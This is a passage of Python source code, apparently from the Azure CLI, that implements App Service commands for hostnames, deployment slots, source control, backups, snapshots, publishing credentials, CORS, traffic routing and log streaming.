fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
